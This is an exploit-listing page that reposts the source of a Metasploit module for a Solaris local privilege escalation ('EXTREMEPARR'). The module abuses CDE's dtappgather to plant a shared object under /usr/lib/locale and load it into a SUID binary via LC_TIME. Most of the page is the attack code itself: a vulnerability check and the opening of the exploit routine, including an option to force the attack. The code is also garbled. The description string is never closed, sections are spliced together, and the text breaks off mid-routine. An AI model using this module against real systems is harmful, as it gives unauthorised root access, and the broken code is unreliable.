Solaris extremeparr dtappgather privilege escalation (metasploit) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-09-25 |
Type : local |
Platform : solaris
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
'Description' => %q{
This module exploits a directory traversal vulnerability in the
`dtappgather` executable included with Common Desktop Environment (CDE)
on unpatched Solaris systems prior to Solaris 10u11 which allows users
to gain root privileges.
dtappgather allows users to create a user-owned directory at any
location on the filesystem using the `DTUSERSESSION` environment
variable.
This module creates a directory in `/usr/lib/locale`, writes a shared
object to the directory, and runs the specified SUID binary with the
shared object loaded using the `LC_TIME` environment variable.
def symlink(link_target, link_name)
vprint_status "Symlinking #{link_target} to #{link_name}"
rm_f link_name
cmd_exec "ln -sf #{link_target} #{link_name}"
register_file_for_cleanup link_name
end
def check
[dtappgather_path, suid_bin_path].each do |path|
unless setuid? path
vprint_error "#{path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{path} is setuid"
end
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
version = kernel_release
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end